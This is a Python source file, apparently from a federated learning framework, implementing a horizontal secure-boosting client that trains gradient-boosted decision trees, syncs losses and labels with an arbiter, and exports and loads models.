HorzSecureBoostingTransferVariable
from kernel.utils import consts
from kernel.utils.data_util import NoneType
from kernel.utils.label_checker import ClassifyLabelChecker, RegressionLabelChecker
LOGGER = log_utils.get_logger()
class HorzSecureBoostingClient(BoostingTree):
def __init__(self):
super(HorzSecureBoostingClient, self).__init__()
self.mode = consts.HORZ
self.validation_strategy = None
self.loss_fn = None
self.cur_sample_weights = None
self.y = None
self.y_hat = None
self.y_hat_predict = None
self.feature_num = None
self.num_classes = 2
self.tree_dim = 1
self.trees = []
self.feature_importance = {}
self.transfer_inst = HorzSecureBoostingTransferVariable()
self.role = None
self.data_bin = None
self.bin_split_points = None
self.bin_sparse_points = None
self.init_score = None
self.local_loss_history = []
self.classes_ = []
self.role = consts.PROMOTER
# store learnt model param
self.tree_meta = None
self.learnt_tree_param = []
self.aggregator = SecureBoostClientAggregator()
# Since arbiter is not needed in oot mode, it will always wait for the data blocking value
# when creating the HorzFeatureBinningClient object, so the object will not be created here
self.binning_obj = None
# self.binning_obj = HorzFeatureBinningClient()
def set_loss_function(self, objective_param):
loss_type = objective_param.objective
params = objective_param.params
LOGGER.info("set objective, objective is {}".format(loss_type))
if self.task_type == consts.CLASSIFICATION:
if loss_type == "cross_entropy":
if self.num_classes == 2:
self.loss_fn = SigmoidBinaryCrossEntropyLoss()
else:
self.loss_fn = SoftmaxCrossEntropyLoss()
else:
raise NotImplementedError("objective %s not supported yet" % (loss_type))
elif self.task_type == consts.REGRESSION:
if loss_type == "lse":
self.loss_fn = LeastSquaredErrorLoss()
elif loss_type == "lae":
self.loss_fn = LeastAbsoluteErrorLoss()
elif loss_type == "huber":
self.loss_fn = HuberLoss(params[0])
elif loss_type == "fair":
self.loss_fn = FairLoss(params[0])
elif loss_type == "tweedie":
self.loss_fn = TweedieLoss(params[0])
elif loss_type == "log_cosh":
self.loss_fn = LogCoshLoss()
else:
raise NotImplementedError("objective %s not supported yet" % loss_type)
else:
raise NotImplementedError("objective %s not supported yet" % loss_type)
def federated_binning(self, data_instance):
# In order to be compatible with oot mode, the object is not created when it is initialized,
# so it can only be created after it is used somewhere
if self.binning_obj is None:
self.binning_obj = HorzFeatureBinningClient()
if self.use_missing:
binning_result = self.binning_obj.average_run(data_instances=data_instance,
bin_num=self.bin_num, abnormal_list=[NoneType()])
else:
binning_result = self.binning_obj.average_run(data_instances=data_instance,
bin_num=self.bin_num)
return self.binning_obj.convert_feature_to_bin(data_instance, binning_result)
def compute_local_grad_and_hess(self, y_hat):
loss_method = self.loss_fn
if self.task_type == consts.CLASSIFICATION:
grad_and_hess = self.y.join(y_hat, lambda y, f_val: \
(loss_method.compute_grad(y, loss_method.predict(f_val)), \
loss_method.compute_hess(y, loss_method.predict(f_val))))
else:
grad_and_hess = self.y.join(y_hat, lambda y, f_val:
(loss_method.compute_grad(y, f_val),
loss_method.compute_hess(y, f_val)))
return grad_and_hess
def compute_local_loss(self, y, y_hat):
LOGGER.info('computing local loss')
loss_method = self.loss_fn
if self.objective_param.objective in ["lse", "lae", "logcosh", "tweedie", "log_cosh", "huber"]:
# regression tasks
y_predict = y_hat
else:
# classification tasks
y_predict = y_hat.mapValues(lambda val: loss_method.predict(val))
loss = loss_method.compute_loss(y, y_predict)
return float(loss)
@staticmethod
def get_subtree_grad_and_hess(g_h, t_idx: int):
"""
Args:
g_h of g_h val
t_idx: tree index
Returns: grad and hess of sub tree
"""
LOGGER.info("get grad and hess of tree {}".format(t_idx))
grad_and_hess_subtree = g_h.mapValues(
lambda grad_and_hess: (grad_and_hess[0][t_idx], grad_and_hess[1][t_idx]))
return grad_and_hess_subtree
def sample_valid_feature(self):
if self.feature_num is None:
self.feature_num = self.bin_split_points.shape[0]
chosen_feature = random.choice(range(0, self.feature_num), \
max(1, int(self.subsample_feature_rate * self.feature_num)), replace=False)
valid_features = [False for i in range(self.feature_num)]
for fid in chosen_feature:
valid_features[fid] = True
return valid_features
@staticmethod
def add_y_hat(f_val, new_f_val, lr=0.1, idx=0):
f_val[idx] += lr * new_f_val
return f_val
def update_y_hat_val(self, new_val=None, mode='train', tree_idx=0):
LOGGER.debug('update y_hat value, current tree is {}'.format(tree_idx))
add_func = functools.partial(self.add_y_hat, lr=self.learning_rate, idx=tree_idx)
if mode == 'train':
self.y_hat = self.y_hat.join(new_val, add_func)
else:
self.y_hat_predict = self.y_hat_predict.join(new_val, add_func)
def update_feature_importance(self, tree_feature_importance):
for fid in tree_feature_importance:
if fid not in self.feature_importance:
self.feature_importance[fid] = tree_feature_importance[fid]
else:
self.feature_importance[fid] += tree_feature_importance[fid]
def sync_feature_num(self):
self.transfer_inst.feature_number.remote(self.feature_num, role=consts.ARBITER, idx=-1, suffix=('feat_num',))
def sync_local_loss(self, cur_loss: float, sample_num: int, suffix):
data = {'cur_loss': cur_loss, 'sample_num': sample_num}
self.transfer_inst.loss_status.remote(data, role=consts.ARBITER, idx=-1, suffix=suffix)
LOGGER.debug('loss status sent')
def sync_tree_dim(self, tree_dim: int):
self.transfer_inst.tree_dim.remote(tree_dim, suffix=('tree_dim',))
LOGGER.debug('tree dim sent')
def sync_stop_flag(self, suffix) -> bool:
flag = self.transfer_inst.stop_flag.get(idx=0, suffix=suffix)
return flag
def check_labels(self, data_inst, ) -> List[int]:
LOGGER.debug('checking labels')
classes_ = None
if self.task_type == consts.CLASSIFICATION:
num_classes, classes_ = ClassifyLabelChecker.validate_label(data_inst)
else:
RegressionLabelChecker.validate_label(data_inst)
return classes_
def generate_flowid(self, round_num, tree_num):
LOGGER.info("generate flowid, flowid {}".format(self.flowid))
return ".".join(map(str, [self.flowid, round_num, tree_num]))
def label_alignment(self, labels: List[int]):
self.transfer_inst.local_labels.remote(labels, suffix=('label_align',))
def get_valid_features(self, epoch_idx, t_idx):
valid_feature = self.transfer_inst.valid_features.get(idx=0, suffix=('valid_features', epoch_idx, t_idx))
return valid_feature
def fit(self, data_inst, validate_data=None, ):
# print(data_inst.count())
# print(list(data_inst.collect()))
# binning
data_inst = self.data_alignment(data_inst)
self.data_bin, self.bin_split_points, self.bin_sparse_points = self.federated_binning(data_inst)
print(self.data_bin.first())
# fid mapping
self.gen_feature_fid_mapping(data_inst.schema)
# set feature_num
self.feature_num = self.bin_split_points.shape[0]
# sync feature num
self.sync_feature_num()
# initialize validation strategy
self.validation_strategy = self.init_validation_strategy(train_data=data_inst, validate_data=validate_data, )
# check labels
local_classes = self.check_labels(self.data_bin) # [0,1]
# sync label class and set y
if self.task_type == consts.CLASSIFICATION:
self.transfer_inst.local_labels.remote(local_classes, role=consts.ARBITER, suffix=('label_align',))
new_label_mapping = self.transfer_inst.label_mapping.get(idx=0, suffix=('label_mapping',)) # {0: 0, 1: 1}
self.classes_ = [new_label_mapping[k] for k in new_label_mapping]
# set labels
self.num_classes = len(new_label_mapping)
LOGGER.debug('num_classes is {}'.format(self.num_classes))
self.y = self.data_bin.mapValues(lambda instance: new_label_mapping[instance.label])
# set tree dimension
self.tree_dim = self.num_classes if self.num_classes > 2 else 1
else:
self.y = self.data_bin.mapValues(lambda instance: instance.label)
# print(list(self.y.collect()))
# set loss function
self.set_loss_function(self.objective_param)
# set y_hat_val
self.y_hat, self.init_score = self.loss_fn.initialize(self.y) if self.tree_dim == 1 else \
self.loss_fn.initialize(self.y, self.tree_dim)
# print(list(self.y_hat.collect()))
for epoch_idx in range(self.num_trees):
g_h = self.compute_local_grad_and_hess(self.y_hat)
# print(list(g_h.collect()))
for t_idx in range(self.tree_dim):
valid_features = self.get_valid_features(epoch_idx,
t_idx) # <class 'list'>: [True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True, True]
LOGGER.debug('valid features are {}'.format(valid_features))
subtree_g_h = self.get_subtree_grad_and_hess(g_h, t_idx)
flow_id = self.generate_flowid(epoch_idx, t_idx)
new_tree = HorzDecisionTreeClient(self.tree_param, self.data_bin, self.bin_split_points,
self.bin_sparse_points, subtree_g_h, valid_feature=valid_features
, epoch_idx=epoch_idx, role=self.role, tree_idx=t_idx,
flow_id=flow_id, mode='train')
new_tree.fit()
# update y_hat_val
self.update_y_hat_val(new_val=new_tree.sample_weights, mode='train', tree_idx=t_idx)
self.trees.append(new_tree)
self.tree_meta, new_tree_param = new_tree.get_model()
self.learnt_tree_param.append(new_tree_param)
self.update_feature_importance(new_tree.get_feature_importance())
# sync loss status
loss = self.compute_local_loss(self.y, self.y_hat)
LOGGER.debug('local loss of epoch {} is {}'.format(epoch_idx, loss))
self.local_loss_history.append(loss)
self.aggregator.send_local_loss(loss, self.data_bin.count(), suffix=(epoch_idx,))
# validate
if self.validation_strategy:
self.validation_strategy.validate(self, epoch_idx)
# check stop flag if n_iter_no_change is True
if self.n_iter_no_change:
should_stop = self.aggregator.get_converge_status(suffix=(str(epoch_idx),))
LOGGER.debug('got stop flag {}'.format(should_stop))
if should_stop:
LOGGER.debug('stop triggered')
break
self.tracker.add_task_progress(1)
LOGGER.debug('fitting tree {}/{}'.format(epoch_idx, self.num_trees))
LOGGER.debug('fitting horz decision tree done')
def predict(self, data_inst):
to_predict_data = self.data_alignment(data_inst)
init_score = self.init_score
self.y_hat_predict = data_inst.mapValues(lambda x: init_score)
round_num = len(self.learnt_tree_param) // self.tree_dim
idx = 0
for round_idx in range(round_num):
for tree_idx in range(self.tree_dim):
tree_inst = HorzDecisionTreeClient(tree_param=self.tree_param, mode='predict')
tree_inst.load_model(model_meta=self.tree_meta, model_param=self.learnt_tree_param[idx])
idx += 1
predict_val = tree_inst.predict(to_predict_data)
self.update_y_hat_val(predict_val, mode='predict', tree_idx=tree_idx)
predict_result = None
if self.task_type == consts.REGRESSION and \
self.objective_param.objective in ["lse", "lae", "huber", "log_cosh", "fair", "tweedie"]:
predict_result = to_predict_data.join(self.y_hat_predict,
lambda inst, pred: [inst.label, float(pred), float(pred),
{"label": float(pred)}])
elif self.task_type == consts.CLASSIFICATION:
classes_ = self.classes_
loss_func = self.loss_fn
if self.num_classes == 2:
predicts = self.y_hat_predict.mapValues(lambda f: float(loss_func.predict(f)))
threshold = self.predict_param.threshold
predict_result = to_predict_data.join(predicts, lambda inst, pred: [inst.label,
classes_[1] if pred > threshold else
classes_[0], pred,
{"0": 1 - pred, "1": pred}])
else:
predicts = self.y_hat_predict.mapValues(lambda f: loss_func.predict(f).tolist())
predict_result = to_predict_data.join(predicts, lambda inst, preds: [inst.label, \
classes_[np.argmax(preds)],
np.max(preds), dict(
zip(map(str, classes_), preds))])
return predict_result
def get_feature_importance(self):
return self.feature_importance
def get_model_meta(self):
model_meta = BoostingTreeModelMeta()
model_meta.tree_meta.CopyFrom(self.tree_meta)
model_meta.learning_rate = self.learning_rate
model_meta.num_trees = self.num_trees
model_meta.quantile_meta.CopyFrom(QuantileMeta(bin_num=self.bin_num))
model_meta.objective_meta.CopyFrom(ObjectiveMeta(objective=self.objective_param.objective,
param=self.objective_param.params))
model_meta.task_type = self.task_type
model_meta.n_iter_no_change = self.n_iter_no_change
model_meta.tol = self.tol
meta_name = "HorzSecureBoostingTreePromoterMeta"
return meta_name, model_meta
def set_model_meta(self, model_meta):
if type(model_meta) is dict:
tree_meta = model_meta.get("treeMeta")
self.tree_meta = DecisionTreeModelMeta()
self.tree_meta.max_depth = tree_meta.get("maxDepth")
self.tree_meta.min_sample_split = tree_meta.get("minSampleSplit")
self.tree_meta.min_impurity_split = tree_meta.get("minImpuritySplit")
self.tree_meta.min_leaf_node = tree_meta.get("minLeafNode")
if tree_meta.get("criterionMeta"):
self.tree_meta.criterion_meta.CopyFrom(
CriterionMeta(criterion_method=tree_meta.get("criterionMeta").get("criterionMethod"),
criterion_param=list(tree_meta.get("criterionMeta").get("criterionParam"))))
self.tree_meta.use_missing = tree_meta.get("useMissing")
self.tree_meta.zero_as_missing = tree_meta.get("zeroAsMissing")
self.learning_rate = model_meta.get("learningRate")
self.num_trees = model_meta.get("numTrees")
self.bin_num = model_meta.get("quantileMeta").get("binNum")
self.objective_param.objective = model_meta.get("objectiveMeta").get("objective")
self.objective_param.params = list(model_meta.get("objectiveMeta").get("param"))
self.task_type = model_meta.get("taskType")
self.n_iter_no_change = model_meta.get("nIterNoChange")
self.tol = model_meta.get("tol")
else:
self.tree_meta = model_meta.tree_meta
self.learning_rate = model_meta.learning_rate
self.num_trees = model_meta.num_trees
self.bin_num = model_meta.quantile_meta.bin_num
self.objective_param.objective = model_meta.objective_meta.objective
self.objective_param.params = list(model_meta.objective_meta.param)
self.task_type = model_meta.task_type
self.n_iter_no_change = model_meta.n_iter_no_change
self.tol = model_meta.tol
def get_model_param(self):
model_param = BoostingTreeModelParam()
model_param.tree_num = len(list(self.learnt_tree_param))
model_param.tree_dim = self.tree_dim
model_param.trees_.extend(self.learnt_tree_param)
model_param.init_score.extend(self.init_score)
model_param.losses.extend(self.local_loss_history)
model_param.classes_.extend(map(str, self.classes_))
model_param.num_classes = self.num_classes
model_param.best_iteration = -1
feature_importance = list(self.get_feature_importance().items())
feature_importance = sorted(feature_importance, key=itemgetter(1), reverse=True)
feature_importance_param = []
for fid, importance in feature_importance:
feature_importance_param.append(FeatureImportanceInfo(fid=fid,
fullname=self.feature_name_fid_mapping[fid],
sitename=self.role,
importance=importance.importance,
importance2=importance.importance_2,
main=importance.main_type
))
model_param.feature_importances.extend(feature_importance_param)
model_param.feature_name_fid_mapping.update(self.feature_name_fid_mapping)
param_name = "HorzSecureBoostingTreePromoterParam"
return param_name, model_param
def get_cur_model(self):
meta_name, meta_protobuf = self.get_model_meta()
param_name, param_protobuf = self.get_model_param()
return {meta_name: meta_protobuf,
param_name: param_protobuf
}
def set_model_param(self, model_param):
if type(model_param) is dict:
for tree in list(model_param.get("trees")):
tree_param = DecisionTreeModelParam()
for node in tree['tree']:
tree_param.tree_.add(id=node['id'],
sitename=node['sitename'],
fid=node['fid'],
bid=node['bid'],
weight=node['weight'],
is_leaf=node['isLeaf'],
left_nodeid=node['leftNodeid'],
right_nodeid=node['rightNodeid'],
missing_dir=node['missingDir'])
splitMaskdict = dict([int(b), v] for b, v in tree['splitMaskdict'].items())
missingDirMaskdict = dict([int(b), v] for b, v in tree['missingDirMaskdict'].items())
tree_param.split_maskdict.update(splitMaskdict)
tree_param.missing_dir_maskdict.update(missingDirMaskdict)
self.trees.append(tree_param)
self.learnt_tree_param.append(tree_param)
# self.learnt_tree_param = list(model_param.get("trees"))
self.tree_dim = model_param.get("treeDim")
self.init_score = np.array(list(model_param.get("initScore")))
self.history_loss = list(model_param.get("losses"))
self.classes_ = list(map(int, model_param.get("classes")))
self.num_classes = model_param.get("numClasses")
featureNameFidMapping = dict([int(b), v] for b, v in model_param['featureNameFidMapping'].items())
self.feature_name_fid_mapping.update(featureNameFidMapping)
else:
self.learnt_tree_param = list(model_param.trees_)
self.init_score = np.array(list(model_param.init_score))
self.local_loss_history = list(model_param.losses)
self.classes_ = list(model_param.classes_)
self.tree_dim = model_param.tree_dim
self.num_classes = model_param.num_classes
self.feature_name_fid_mapping.update(model_param.feature_name_fid_mapping)
def get_metrics_param(self):
if self.task_type == consts.CLASSIFICATION:
if self.num_classes == 2:
return EvaluateParam(eval_type="binary",
pos_label=self.classes_[1])
else:
return EvaluateParam(eval_type="multi")
else:
return EvaluateParam(eval_type="regression")
def export_model(self):
if self.need_cv:
return None
return self.get_cur_model()
def load_model(self, model_dict):
model_param = None
model_meta = None
for _, value in model_dict["model"].items():
for model in value:
if type(model) == str:
if model.endswith("Meta"):
model_meta = value[model]
if model.endswith("Param"):
model_param = value[model]
else:
for obj in model.items():
key = obj[0]
if key.endswith("Meta"):
model_meta = obj[1]
if key.endswith("Param"):
model_param = obj[1]
LOGGER.info("load model")
self.set_model_meta(model_meta)
self.set_model_param(model_param)
self.set_loss_function(self.objective_param)
def cross_validation(self, data_instances):
if not self.need_run:
return data_instances
kflod_obj = KFold()
cv_param = self._get_cv_param()
kflod_obj.run(cv_param, data_instances, self, True)
return data_instances
| 26,854 | 7,937 |